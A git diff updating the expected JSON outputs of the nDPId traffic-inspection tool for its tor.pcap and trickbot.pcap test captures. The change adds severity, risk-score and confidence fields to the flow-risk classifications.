-00844{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2075,"source":"tor.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1383822190886,"flow_last_seen":1383822190951,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":218,"flow_tot_l4_payload_len":218,"flow_avg_l4_payload_len":54,"midstream":0,"ts_msec":1383822190951,"l3_proto":"ip4","src_ip":"192.168.1.252","dst_ip":"62.210.137.230","src_port":51185,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7":"Obsolete TLS version (older than 1.2)"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"www.6gyip7tqim7sieb.com","ja3":"581a3c7f54555512b8cd16e87dfe165b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}}
-01047{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2077,"source":"tor.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1383822190886,"flow_last_seen":1383822191037,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":740,"flow_tot_l4_payload_len":958,"flow_avg_l4_payload_len":159,"midstream":0,"ts_msec":1383822191037,"l3_proto":"ip4","src_ip":"192.168.1.252","dst_ip":"62.210.137.230","src_port":51185,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7":"Obsolete TLS version (older than 1.2)"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"www.6gyip7tqim7sieb.com","ja3":"581a3c7f54555512b8cd16e87dfe165b","ja3s":"184d532a16876b78846ae6a03f654890","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA","issuerDN":"CN=www.a3uycdf3rn5md.com","subjectDN":"CN=www.l7xvysfnvkb.net","fingerprint":"EE:86:E7:21:36:93:23:30:DB:A0:09:48:55:16:CB:A8:E9:DA:01:D0"}}
+00949{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2075,"source":"tor.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1383822190886,"flow_last_seen":1383822190951,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":218,"flow_tot_l4_payload_len":218,"flow_avg_l4_payload_len":54,"midstream":0,"ts_msec":1383822190951,"l3_proto":"ip4","src_ip":"192.168.1.252","dst_ip":"62.210.137.230","src_port":51185,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"www.6gyip7tqim7sieb.com","ja3":"581a3c7f54555512b8cd16e87dfe165b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}}
+01152{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2077,"source":"tor.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1383822190886,"flow_last_seen":1383822191037,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":740,"flow_tot_l4_payload_len":958,"flow_avg_l4_payload_len":159,"midstream":0,"ts_msec":1383822191037,"l3_proto":"ip4","src_ip":"192.168.1.252","dst_ip":"62.210.137.230","src_port":51185,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"www.6gyip7tqim7sieb.com","ja3":"581a3c7f54555512b8cd16e87dfe165b","ja3s":"184d532a16876b78846ae6a03f654890","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA","issuerDN":"CN=www.a3uycdf3rn5md.com","subjectDN":"CN=www.l7xvysfnvkb.net","fingerprint":"EE:86:E7:21:36:93:23:30:DB:A0:09:48:55:16:CB:A8:E9:DA:01:D0"}}
 00353{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":2097,"source":"tor.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":38,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"ts_msec":1383822192212,"pkt":"AYDCAAAA\/lQA2EYhACZCQgMAAAAAAIAAUlQAwqwfAAAAAIAAUlQAwqwfgAMAABQAAgAAAAAAAAAAAAAA"}
 00163{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":2097,"source":"tor.pcap","alias":"nDPId-test","layer_type":38}
 00353{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":2107,"source":"tor.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":38,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"ts_msec":1383822194212,"pkt":"AYDCAAAA\/lQA2EYhACZCQgMAAAAAAIAAUlQAwqwfAAAAAIAAUlQAwqwfgAMAABQAAgAAAAAAAAAAAAAA"}
@@ -283,14 +283,14 @@
 00163{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":2577,"source":"tor.pcap","alias":"nDPId-test","layer_type":38}
 00353{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":2632,"source":"tor.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":38,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"ts_msec":1383822212212,"pkt":"AYDCAAAA\/lQA2EYhACZCQgMAAAAAAIAAUlQAwqwfAAAAAIAAUlQAwqwfgAMAABQAAgAAAAAAAAAAAAAA"}
 00163{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":2632,"source":"tor.pcap","alias":"nDPId-test","layer_type":38}
-00650{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":2687,"source":"tor.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1383822123915,"flow_last_seen":1383822214039,"flow_idle_time":180000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":576,"flow_avg_l4_payload_len":144,"midstream":0,"ts_msec":1383822214212,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"192.168.1.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}}
+00676{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":2687,"source":"tor.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1383822123915,"flow_last_seen":1383822214039,"flow_idle_time":180000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":576,"flow_avg_l4_payload_len":144,"midstream":0,"ts_msec":1383822214212,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"192.168.1.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}}
 00353{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":2687,"source":"tor.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":38,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"ts_msec":1383822214212,"pkt":"AYDCAAAA\/lQA2EYhACZCQgMAAAAAAIAAUlQAwqwfAAAAAIAAUlQAwqwfgAMAABQAAgAAAAAAAAAAAAAA"}
 00163{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":2687,"source":"tor.pcap","alias":"nDPId-test","layer_type":38}
 00353{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":2719,"source":"tor.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":38,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"ts_msec":1383822216212,"pkt":"AYDCAAAA\/lQA2EYhACZCQgMAAAAAAIAAUlQAwqwfAAAAAIAAUlQAwqwfgAMAABQAAgAAAAAAAAAAAAAA"}
 00163{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":2719,"source":"tor.pcap","alias":"nDPId-test","layer_type":38}
 00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2745,"source":"tor.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1383822217531,"flow_last_seen":1383822217531,"flow_idle_time":180000,"flow_min_l4_payload_len":89,"flow_max_l4_payload_len":89,"flow_tot_l4_payload_len":89,"flow_avg_l4_payload_len":89,"midstream":0,"ts_msec":1383822217531,"l3_proto":"ip6","src_ip":"fe80::c583:1972:5728:7323","dst_ip":"ff02::1:2","src_port":546,"dst_port":547,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00576{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2745,"source":"tor.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":1,"flow_last_seen":1383822217531,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":151,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":151,"pkt_l4_len":97,"ts_msec":1383822217531,"pkt":"MzMAAQACUlQAWul3ht1gAAAAAGERAf6AAAAAAAAAxYMZclcocyP\/AgAAAAAAAAAAAAAAAQACAiICIwBhDIMBZjPcAAgAAgAAAAEADgABAAEXdNYHUlQAoBS4AAMADA5SVAAAAAAAAAAAAAAnAAsACUVuZGlhbi1QQwAQAA4AAAE3AAhNU0ZUIDUuMAAGAAgAGAAXABEAJw=="}
-00613{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2745,"source":"tor.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1383822217531,"flow_last_seen":1383822217531,"flow_idle_time":180000,"flow_min_l4_payload_len":89,"flow_max_l4_payload_len":89,"flow_tot_l4_payload_len":89,"flow_avg_l4_payload_len":89,"midstream":0,"ts_msec":1383822217531,"l3_proto":"ip6","src_ip":"fe80::c583:1972:5728:7323","dst_ip":"ff02::1:2","src_port":546,"dst_port":547,"l4_proto":"udp","ndpi": {"proto":"DHCPV6","breed":"Acceptable","category":"Network"}}
+00639{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2745,"source":"tor.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1383822217531,"flow_last_seen":1383822217531,"flow_idle_time":180000,"flow_min_l4_payload_len":89,"flow_max_l4_payload_len":89,"flow_tot_l4_payload_len":89,"flow_avg_l4_payload_len":89,"midstream":0,"ts_msec":1383822217531,"l3_proto":"ip6","src_ip":"fe80::c583:1972:5728:7323","dst_ip":"ff02::1:2","src_port":546,"dst_port":547,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DHCPV6","breed":"Acceptable","category":"Network"}}
 00353{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":2775,"source":"tor.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":38,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"ts_msec":1383822218212,"pkt":"AYDCAAAA\/lQA2EYhACZCQgMAAAAAAIAAUlQAwqwfAAAAAIAAUlQAwqwfgAMAABQAAgAAAAAAAAAAAAAA"}
 00163{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":2775,"source":"tor.pcap","alias":"nDPId-test","layer_type":38}
 00576{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2800,"source":"tor.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":2,"flow_last_seen":1383822218758,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":151,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":151,"pkt_l4_len":97,"ts_msec":1383822218758,"pkt":"MzMAAQACUlQAWul3ht1gAAAAAGERAf6AAAAAAAAAxYMZclcocyP\/AgAAAAAAAAAAAAAAAQACAiICIwBhDB8BZjPcAAgAAgBkAAEADgABAAEXdNYHUlQAoBS4AAMADA5SVAAAAAAAAAAAAAAnAAsACUVuZGlhbi1QQwAQAA4AAAE3AAhNU0ZUIDUuMAAGAAgAGAAXABEAJw=="}
@@ -353,12 +353,12 @@
 00163{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":3858,"source":"tor.pcap","alias":"nDPId-test","layer_type":38}
 00353{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":3859,"source":"tor.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":38,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"ts_msec":1383822276211,"pkt":"AYDCAAAA\/lQA2EYhACZCQgMAAAAAAIAAUlQAwqwfAAAAAIAAUlQAwqwfgAMAABQAAgAAAAAAAAAAAAAA"}
 00163{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":3859,"source":"tor.pcap","alias":"nDPId-test","layer_type":38}
-00775{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3859,"source":"tor.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":38,"flow_first_seen":1383822129897,"flow_last_seen":1383822265221,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":10408,"flow_avg_l4_payload_len":273,"midstream":0,"ts_msec":1383822276211,"l3_proto":"ip4","src_ip":"192.168.1.252","dst_ip":"91.143.93.242","src_port":51175,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7":"Obsolete TLS version (older than 1.2)","16":"Suspicious DGA domain name","22":"Unsafe Protocol"},"proto":"TLS.Tor","breed":"Potentially Dangerous","category":"VPN"}}
-00648{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3859,"source":"tor.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":6,"flow_first_seen":1383822123915,"flow_last_seen":1383822274144,"flow_idle_time":180000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":864,"flow_avg_l4_payload_len":144,"midstream":0,"ts_msec":1383822276211,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"192.168.1.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}}
-00653{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3859,"source":"tor.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":6,"flow_first_seen":1383822217531,"flow_last_seen":1383822248944,"flow_idle_time":180000,"flow_min_l4_payload_len":89,"flow_max_l4_payload_len":89,"flow_tot_l4_payload_len":534,"flow_avg_l4_payload_len":89,"midstream":0,"ts_msec":1383822276211,"l3_proto":"ip6","src_ip":"fe80::c583:1972:5728:7323","dst_ip":"ff02::1:2","src_port":546,"dst_port":547,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DHCPV6","breed":"Acceptable","category":"Network"}}
-00698{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3859,"source":"tor.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"finished","flow_packets_processed":29,"flow_first_seen":1383822190886,"flow_last_seen":1383822265123,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":8029,"flow_avg_l4_payload_len":276,"midstream":0,"ts_msec":1383822276211,"l3_proto":"ip4","src_ip":"192.168.1.252","dst_ip":"62.210.137.230","src_port":51185,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7":"Obsolete TLS version (older than 1.2)"},"proto":"TLS","breed":"Safe","category":"Web"}}
-00697{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3859,"source":"tor.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":32,"flow_first_seen":1383822129889,"flow_last_seen":1383822265160,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":8625,"flow_avg_l4_payload_len":269,"midstream":0,"ts_msec":1383822276211,"l3_proto":"ip4","src_ip":"192.168.1.252","dst_ip":"212.83.155.250","src_port":51174,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7":"Obsolete TLS version (older than 1.2)"},"proto":"TLS","breed":"Safe","category":"Web"}}
-00701{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3859,"source":"tor.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"finished","flow_packets_processed":1826,"flow_first_seen":1383822130889,"flow_last_seen":1383822265215,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":1411596,"flow_avg_l4_payload_len":773,"midstream":0,"ts_msec":1383822276211,"l3_proto":"ip4","src_ip":"192.168.1.252","dst_ip":"38.229.70.53","src_port":51176,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7":"Obsolete TLS version (older than 1.2)"},"proto":"TLS","breed":"Safe","category":"Web"}}
+01043{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3859,"source":"tor.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":38,"flow_first_seen":1383822129897,"flow_last_seen":1383822265221,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":10408,"flow_avg_l4_payload_len":273,"midstream":0,"ts_msec":1383822276211,"l3_proto":"ip4","src_ip":"192.168.1.252","dst_ip":"91.143.93.242","src_port":51175,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"16": {"risk":"Suspicious DGA Domain name","severity":"High","risk_score": {"total":250,"client":125,"server":125}},"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"TLS.Tor","breed":"Potentially Dangerous","category":"VPN"}}
+00674{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3859,"source":"tor.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":6,"flow_first_seen":1383822123915,"flow_last_seen":1383822274144,"flow_idle_time":180000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":864,"flow_avg_l4_payload_len":144,"midstream":0,"ts_msec":1383822276211,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"192.168.1.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}}
+00679{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3859,"source":"tor.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":6,"flow_first_seen":1383822217531,"flow_last_seen":1383822248944,"flow_idle_time":180000,"flow_min_l4_payload_len":89,"flow_max_l4_payload_len":89,"flow_tot_l4_payload_len":534,"flow_avg_l4_payload_len":89,"midstream":0,"ts_msec":1383822276211,"l3_proto":"ip6","src_ip":"fe80::c583:1972:5728:7323","dst_ip":"ff02::1:2","src_port":546,"dst_port":547,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DHCPV6","breed":"Acceptable","category":"Network"}}
+00803{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3859,"source":"tor.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"finished","flow_packets_processed":29,"flow_first_seen":1383822190886,"flow_last_seen":1383822265123,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":8029,"flow_avg_l4_payload_len":276,"midstream":0,"ts_msec":1383822276211,"l3_proto":"ip4","src_ip":"192.168.1.252","dst_ip":"62.210.137.230","src_port":51185,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}}
+00802{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3859,"source":"tor.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":32,"flow_first_seen":1383822129889,"flow_last_seen":1383822265160,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":8625,"flow_avg_l4_payload_len":269,"midstream":0,"ts_msec":1383822276211,"l3_proto":"ip4","src_ip":"192.168.1.252","dst_ip":"212.83.155.250","src_port":51174,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}}
+00806{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3859,"source":"tor.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"finished","flow_packets_processed":1826,"flow_first_seen":1383822130889,"flow_last_seen":1383822265215,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":1411596,"flow_avg_l4_payload_len":773,"midstream":0,"ts_msec":1383822276211,"l3_proto":"ip4","src_ip":"192.168.1.252","dst_ip":"38.229.70.53","src_port":51176,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}}
 00155{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":3859,"source":"tor.pcap","alias":"nDPId-test","total-events-serialized":362}
 ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~
 ~~ packets captured/processed: 3859/3694
@@ -368,10 +368,10 @@
 ~~ total active/idle flows...: 12/12
 ~~ total timeout flows.......: 0
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
-~~ total memory allocated....: 4729866 bytes
-~~ total memory freed........: 4729866 bytes
-~~ total allocations/frees...: 103301/103301
+~~ total memory allocated....: 4811211 bytes
+~~ total memory freed........: 4811211 bytes
+~~ total allocations/frees...: 104891/104891
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 ~~ json string min len.......: 160 chars
-~~ json string max len.......: 1137 chars
-~~ json string avg len.......: 649 chars
+~~ json string max len.......: 1405 chars
+~~ json string avg len.......: 783 chars
diff --git a/test/results/trickbot.pcap.out b/test/results/trickbot.pcap.out
index 05cca1f57..908dea86a 100644
--- a/test/results/trickbot.pcap.out
+++ b/test/results/trickbot.pcap.out
@@ -3,9 +3,9 @@
 00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"trickbot.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1609266107551,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1609266107551,"pkt":"IOUqtpPxAAgCHEeuCABFAAA0c9FAAIAGK0cKDB1lUnbhxO+GG6gSdtdWAAAAAIAC\/\/8eaQAAAgQFtAEDAwgBAQQC"}
 00450{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"trickbot.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1609266107797,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"ts_msec":1609266107797,"pkt":"AAgCHEeuIOUqtpPxCABFAAAsYEQAAIAGftxSduHECgwdZRuo74Zi7VJcEnbXV2AS+vCXMwAAAgQFtA=="}
 00444{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"trickbot.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1609266107797,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"ts_msec":1609266107797,"pkt":"IOUqtpPxAAgCHEeuCABFAAAoc9JAAIAGK1IKDB1lUnbhxO+GG6gSdtdXYu1SXVAQ\/\/+p4QAA"}
-00916{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"trickbot.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1609266107551,"flow_last_seen":1609266107797,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":349,"flow_tot_l4_payload_len":349,"flow_avg_l4_payload_len":87,"midstream":0,"ts_msec":1609266107797,"l3_proto":"ip4","src_ip":"10.12.29.101","dst_ip":"82.118.225.196","src_port":61318,"dst_port":7080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"82.118.225.196","url":"82.118.225.196:7080\/OK21pqJAtyyGBEo00sk","code":0,"content_type":"","user_agent":"Mozilla\/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident\/7.0; .NET4.0C; .NET4.0E)"}}
-00970{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":8,"source":"trickbot.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1609266107551,"flow_last_seen":1609266108728,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1358,"flow_tot_l4_payload_len":2635,"flow_avg_l4_payload_len":329,"midstream":0,"ts_msec":1609266108728,"l3_proto":"ip4","src_ip":"10.12.29.101","dst_ip":"82.118.225.196","src_port":61318,"dst_port":7080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address","25":"HTTP suspicious content"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"82.118.225.196","url":"82.118.225.196:7080\/OK21pqJAtyyGBEo00sk","code":200,"content_type":"text\/html","user_agent":"Mozilla\/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident\/7.0; .NET4.0C; .NET4.0E)"}}
-00768{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":74,"source":"trickbot.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":74,"flow_first_seen":1609266107551,"flow_last_seen":1609266115947,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":57990,"flow_avg_l4_payload_len":783,"midstream":0,"ts_msec":1609266115947,"l3_proto":"ip4","src_ip":"10.12.29.101","dst_ip":"82.118.225.196","src_port":61318,"dst_port":7080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address","25":"HTTP suspicious content"},"proto":"HTTP","breed":"Acceptable","category":"Web"}}
